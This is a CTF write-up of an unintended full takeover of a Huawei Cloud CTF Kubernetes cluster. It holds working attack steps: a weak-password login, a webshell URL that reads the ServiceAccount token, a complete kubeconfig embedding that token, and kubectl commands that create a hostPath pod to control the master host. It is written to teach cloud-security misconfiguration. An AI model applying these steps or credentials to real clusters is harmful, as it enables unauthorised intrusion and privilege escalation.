Title: Huawei Cloud CTF "Cloud" challenge: an unintended solution and hands-on K8s penetration

Preface

I have recently become quite interested in cloud security and have been studying the architecture and operation of k8s. I happened to come across this Huawei Cloud CTF and learned a lot from it.

(We even obtained the highest privileges over the platform's challenge cluster through an unintended solution.)

0x00 Finding the challenge entry point

Opening the challenge, we find a site that looks like it provides IaaS services. A quick directory scan turned up several files and routes:

phpinfo.php

robots.txt

admin/

login/

Static/

Strangely, even though phpinfo exists (suggesting a PHP stack), some routes return a 403 page from a beego framework backend:

Our preliminary guess is that .php files are handed off to nginx's FastCGI (php-fpm) handler, while all other routes are proxied to the beego application.
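As a quick sanity check of this routing guess (the host placeholder and expected responses below are assumptions based on the behaviour described above, not output from the challenge), one can compare how the two kinds of paths are answered:

# .php path: expected to be answered by nginx + php-fpm (FastCGI)
curl -sI http://<target>/phpinfo.php
# non-.php path: expected to be answered by the beego backend (the 403 page seen above)
curl -sI http://<target>/admin/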

Looking first at the /admin route, we find a hidden login form.

Naturally, we tried brute-forcing weak credentials with Burp Suite and found the weak password admin:admin.

After logging in successfully, two URLs are returned: a download link for tools.zip and /wsproxy, which by its name looks like a WebSocket proxy route. Reading the source code in tools.zip confirms that it is a wsproxy client program.

At this point we have found our channel into the intranet.

0x01 Entering the intranet via wsproxy

Compiling the tools source code gives us the client connection program.

According to the usage instructions, a simple command connects to the challenge's wsproxy. The password is in pass.txt (UAF) in the tools source directory, and the session is the beego session cookie issued by the challenge after logging in to /admin.

This opens a SOCKS5 proxy on local port 1080, and through it we can reach the intranet.
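To push other tools through this tunnel later (curl, kubectl, and so on), any SOCKS5-aware wrapper works; a minimal sketch, assuming proxychains4 is installed and the wsproxy client is listening on 127.0.0.1:1080:

# /etc/proxychains4.conf (or a local copy passed with -f): last line under [ProxyList]
socks5 127.0.0.1 1080

# then prefix intranet-bound commands, e.g. probing the api-server address found below
proxychains4 curl -k https://10.247.0.1:443/

curl can also use the tunnel directly via its built-in SOCKS support, e.g. curl --socks5-hostname 127.0.0.1:1080 -k https://10.247.0.1:443/.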

0x02 phpinfo leaks k8s cluster information

Given the challenge name "Cloud", and the large number of service-related environment variables (including the k8s api-server address) exposed in phpinfo.php, the names and values of these variables tell us that this is a k8s cluster and that our challenge runs as a pod inside it.

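For context, a pod inside a k8s cluster normally receives service-discovery environment variables of roughly this shape (the values below are illustrative; only the api-server address matches what the challenge exposed):

KUBERNETES_SERVICE_HOST=10.247.0.1
KUBERNETES_SERVICE_PORT=443
KUBERNETES_PORT=tcp://10.247.0.1:443
# plus one <SERVICE_NAME>_SERVICE_HOST / <SERVICE_NAME>_SERVICE_PORT pair per Service in the namespace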

0x03 k8s infrastructure introduction

Before going deeper, we need to understand some basics of the k8s architecture.

As shown in the architecture diagram above, a Kubernetes cluster is divided into two main parts, Master and Nodes, a typical distributed architecture.

First, external applications interact with the Master through the HTTP API exposed by the api-server, and every API request must first pass authentication. A Node hosts multiple pods, each pod runs one or more containers (usually Docker containers), and the applications we write run inside the containers of these pods.

Second, to publish pods so that they can be reached from outside, we need the Service. A Service is an abstraction that exposes an application running on a set of pods as a network service; it is typically configured with an externally reachable IP address, port mappings, and so on. Through the Service we can reach the corresponding pods.
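As a concrete illustration (the names and ports here are invented for the sketch, except the NodePort value, which mirrors the one met later in this writeup), a NodePort Service exposing a set of pods on every node's port 30067 looks roughly like this:

apiVersion: v1
kind: Service
metadata:
  name: example-web          # hypothetical Service name
spec:
  type: NodePort
  selector:
    app: example-web         # pods carrying this label receive the traffic
  ports:
  - port: 80                 # cluster-internal Service port
    targetPort: 8080         # container port inside the pod
    nodePort: 30067          # externally reachable port on every node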

Each Node runs a program called kubelet, the node agent; through it the Node reports its status to the api-server and receives instructions.

From this architecture it is not hard to see that, to take down the whole cluster from the outside, what we really need is access to the REST API exposed by the api-server.

0x04 k8s authentication token leak + improper configuration

With that background, let's look at how this particular cluster is configured.

Through the supplied proxy we entered the intranet and accessed the k8s api-server https://10.247.0.1:443 leaked in phpinfo. The api-server is exposed on a network segment the proxy can reach directly, but accessing it returns 401 Unauthorized, so we need to find a way to pass this authentication.

According to phpinfo.php, many services are deployed in the cluster, so we guess that all the challenge containers are orchestrated and managed by this k8s cluster.

Meanwhile, when a k8s cluster is deployed, the ServiceAccount token file is mounted by default at /run/secrets/kubernetes.io/serviceaccount/token in every pod container, so we can read this token through a shell obtained in any other challenge.

A ServiceAccount mainly contains three things: the namespace, the token, and the CA certificate. The namespace specifies where the pod lives, the CA is used to verify the api-server's certificate, and the token is used for authentication. All three are mounted into the pod's filesystem; the token is stored at /var/run/secrets/kubernetes.io/serviceaccount/token and is a JWT signed with the cluster's service-account private key.
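To illustrate how this token is used (a sketch, assuming the token value has been copied to the attacking machine and traffic is sent through the SOCKS5 proxy opened earlier):

# on a compromised pod: read the ServiceAccount token
TOKEN=$(cat /run/secrets/kubernetes.io/serviceaccount/token)
# on the attacking machine: present it as a Bearer token to the api-server
curl --socks5-hostname 127.0.0.1:1080 -k -H "Authorization: Bearer $TOKEN" https://10.247.0.1:443/api/v1/namespaces/default/pods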

Using the webshell we obtained earlier in the webshell_1 challenge, we can read the api-server authentication token:

http://124.70.199.12:32003/upload/71a6e9b8-90b6-4d4f-9acd-bd91c8bbcc5e.jsp?pwd=023i=cat%20/run/secrets/kubernetes.io/serviceaccount/token

At this point we hold a credential accepted by the api-server, which, as it turns out, is equivalent to master-level control of the k8s cluster.

0x05 Obtaining cluster control permissions

With api-server access we can do more or less whatever we want in the cluster~ At this point we realized that this is probably a platform vulnerability rather than the intended solution for the challenge, because with master-level permissions we can view and control all pods (i.e. all web challenges) and grab whichever flags we like.

We can use the command-line tool kubectl to operate against the api-server.

Create a kubeconfig file k8s.yaml as follows, where token is the token obtained above and server is the api-server address:

apiVersion: v1
clusters:
- cluster:
    insecure-skip-tls-verify: true
    server: https://10.247.0.1
  name: cluster-name
contexts:
- context:
    cluster: cluster-name
    namespace: test
    user: admin
  name: admin
current-context: admin
kind: Config
preferences: {}
users:
- name: admin
  user:
    token: eyJhbGciOiJSUzI1NiIsImtpZCI6IiJ9.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJkZWZhdWx0Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImRlZmF1bHQtdG9rZW4tbDh4OGIiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoiZGVmYXVsdCIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50LnVpZCI6IjZiYTQzN2JkLTlhN2EtNGE0ZS1iZTk2LTkyMjkyMmZhNmZiOCIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.XDrZLt7EeMVlTQbXNzb2rfWgTR4DPvKCpp5SftwtfGVUUdvDIOXgYtQip_lQIVOLvtApYtUpeboAecP8fTSVKwMsOLyNhI5hfy6ZrtTB6dKP0Vrl70pwpEvoSFfoI0Ej_NNPNjY3WXkCW5UG9j9uzDMW28z-crLhoIWknW-ae4oP6BNRBID-L1y3NMyngoXI2aaN9uud9M6Bh__YJi8pVxxg2eX9B4_FdOM8wu9EvfVlya502__xGMCZXXx7aHLx9_yzAPEtxUiI6oECo4HYUtyCJh_axBcNJZmwFTNEWp1DB3QcImBXr9P1qof9H1fAu-z12KLfC4-T3dnKLR9q5w

On our own machine, run the following command through the challenge's intranet proxy to connect remotely to the challenge's k8s cluster; authentication succeeds.

kubectl --kubeconfig k8s.yaml cluster-info --insecure-skip-tls-verify=true

At this point we have confirmed access to the k8s api-server. Next, let's try to gain access to the cluster's master host.

By executing

kubectl --kubeconfig k8s.yaml version --insecure-skip-tls-verify=true

The k8s version is v1.15.11. In this deployment, RBAC (role-based access control) authorization is evidently not being enforced.

Kubernetes supports six authorization modes: ABAC (attribute-based access control), RBAC (role-based access control), Webhook, Node, AlwaysDeny, and AlwaysAllow. Since version 1.6 Kubernetes has enabled RBAC by default, and since 1.8 RBAC has been a stable feature.

Therefore, if the operators did not set --authorization-mode=RBAC when building the cluster, then any ServiceAccount token obtained from a compromised pod shell grants broad access to the api-server. Clearly, given the verification above, the operators did not enable this access control when deploying the environment.
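A standard way to confirm how much this token is actually allowed to do (not shown in the original screenshots, but a harmless self-check) is kubectl's permission query:

# list everything the token's ServiceAccount may do in the default namespace
kubectl --kubeconfig k8s.yaml auth can-i --list --insecure-skip-tls-verify=true
# or check a single verb/resource, e.g. whether we may create pods
kubectl --kubeconfig k8s.yaml auth can-i create pods --insecure-skip-tls-verify=true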

0x06 Obtaining host permissions on the master

We can create a new pod and mount the host's entire root directory into it via a hostPath volume. However, creating a pod normally means pulling its image from a remote registry, and the challenge intranet does not appear to have outbound network access, so we need to find an image that has already been pulled locally.

Execute the following command to get the currently pulled images:

kubectl --kubeconfig k8s.yaml get pods --all-namespaces --insecure-skip-tls-verify=true -o jsonpath='{..image}' | tr -s '[[:space:]]' '\n' | sort | uniq -c

The result is as follows:

After trying several images, we found that 100.125.4.222:20202/hwofficial/coredns:1.15.6 is available.

The yaml configuration is as follows:

apiVersion: v1
kind: Pod
metadata:
  name: test-444
spec:
  containers:
  - name: test-444
    image: 100.125.4.222:20202/hwofficial/coredns:1.15.6
    volumeMounts:
    - name: host
      mountPath: /host
  volumes:
  - name: host
    hostPath:
      path: /
      type: Directory

The above configuration mounts the host's root directory to /host inside our pod. Execute the following command to create the pod in the default namespace.

kubectl --kubeconfig k8s.yaml apply -f pod.yaml -n default --insecure-skip-tls-verify=true

Then we enter the pod with kubectl exec and gain control over the host's files.

kubectl --kubeconfig k8s.yaml exec -it test-444 -n default --insecure-skip-tls-verify=true -- bash

At this point, our privileges are effectively as high as those of the organizer's operations team.
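With the host root mounted at /host, one common follow-up (a sketch; whether it works depends on which binaries the coredns image ships, and with a very minimal image you may only be able to read and write files under /host directly) is to pivot into the host filesystem:

# inside the test-444 pod
chroot /host /bin/bash       # shell whose root is the master node's filesystem
cat /host/etc/shadow         # or simply read sensitive host files through the mount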

0x07 Getting the flag

From the steps above it is clear that this is an unintended solution: the leaked platform ServiceAccount token, combined with RBAC authorization not being enabled, let us easily obtain the highest permissions in the k8s cluster, and with them the highest permissions over every challenge container in it.

Within the cluster, we now need to find the pod belonging to our team in order to get the corresponding flag.

So we first query the Services used to expose the challenges in k8s:

kubectl --kubeconfig k8s.yaml get services -n default --insecure-skip-tls-verify=true

All services are listed, along with their cluster IPs and port mappings. From here we can locate the relevant service by its publicly exposed port.

For example, our challenge's public port is 30067, so we search for port 30067.
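A quick way to do that search (the service name will differ per team; the grep target is just the node port) is to filter the service listing:

kubectl --kubeconfig k8s.yaml get services -n default --insecure-skip-tls-verify=true | grep 30067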

This gives us the service behind which our challenge pod sits. We then get the detailed information of this service to obtain the pod name. The command is as follows:

kubectl --kubeconfig k8s.yaml describe service guosai-34-15-service-c521637e -n default --insecure-skip-tls-verify=true

From the output we can see that the app is guosai-34-15, so we search all pods for ones carrying this name.

kubectl --kubeconfig k8s.yaml describe pods guosai-34-15-service-c521637e -n default --insecure-skip-tls-verify=true

Searching through the returned data, we find such a pod. Comparing its virtual IP with the information in phpinfo confirms that this is the pod we are looking for.
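Equivalently, once the Service's selector is visible in the describe output, the matching pods can be listed directly with a label selector (the label key/value below are an assumption based on the app name seen above):

kubectl --kubeconfig k8s.yaml get pods -n default -l app=guosai-34-15 -o wide --insecure-skip-tls-verify=true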

So we have found our pod. After exec-ing into it, we can read the flag.
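The last step then looks something like this (the pod name placeholder comes from the previous query, and the flag path is hypothetical):

# drop into our team's pod and read the flag
kubectl --kubeconfig k8s.yaml exec -it <our-pod-name> -n default --insecure-skip-tls-verify=true -- /bin/sh
cat /flag        # hypothetical flag location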

0x08 Summary

1. k8s configuration file (requires the leaked ServiceAccount token of the k8s cluster), k8s.yaml:

apiVersion: v1
clusters:
- cluster:
    insecure-skip-tls-verify: true
    server: https://10.247.0.1
  name: cluster-name
contexts:
- context:
    cluster: cluster-name
    namespace: test
    user: admin
  name: admin
current-context: admin
kind: Config
preferences: {}
users:
- name: admin
  user:
    token: eyJhbGciOiJSUzI1NiIsImtpZCI6IiJ9.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJkZWZhdWx0Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImRlZmF1bHQtdG9rZW4tbDh4OGIiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoiZGVmYXVsdCIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50LnVpZCI6IjZiYTQzN2JkLTlhN2EtNGE0ZS1iZTk2LTkyMjkyMmZhNmZiOCIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.XDrZLt7EeMVlTQbXNzb2rfWgTR4DPvKCpp5SftwtfGVUUdvDIOXgYtQip_lQIVOLvtApYtUpeboAecP8fTSVKwMsOLyNhI5hfy6ZrtTB6dKP0Vrl70pwpEvoSFfoI0Ej_NNPNjY3WXkCW5UG9j9uzDMW28z-crLhoIWknW-ae4oP6BNRBID-L1y3NMyngoXI2aaN9uud9M6Bh__YJi8pVxxg2eX9B4_FdOM8wu9EvfVlya502__xGMCZXXx7aHLx9_yzAPEtxUiI6oECo4HYUtyCJh_axBcNJZmwFTNEWp1DB3QcImBXr9P1qof9H1fAu-z12KLfC4-T3dnKLR9q5w

2. Authenticate to k8s with kubectl (https://kubernetes.io/zh/docs/tasks/tools/install-kubectl-linux/) and gain access to the api-server:

kubectl --kubeconfig k8s.yaml cluster-info --insecure-skip-tls-verify=true

3. Check the k8s version (Kubernetes has enabled RBAC access control by default since 1.6 and RBAC has been stable since 1.8, but this cluster was deployed without RBAC authorization enforced):

kubectl --kubeconfig k8s.yaml version --insecure-skip-tls-verify=true

4. Create a new pod and mount the host's root directory into it via a hostPath volume. Since creating a pod requires pulling an image and the challenge intranet has no outbound access, first find an image that is already pulled locally by running:

kubectl --kubeconfig k8s.yaml get pods --all-namespaces --insecure-skip-tls-verify=true -o jsonpath='{..image}' | tr -s '[[:space:]]' '\n' | sort | uniq -c
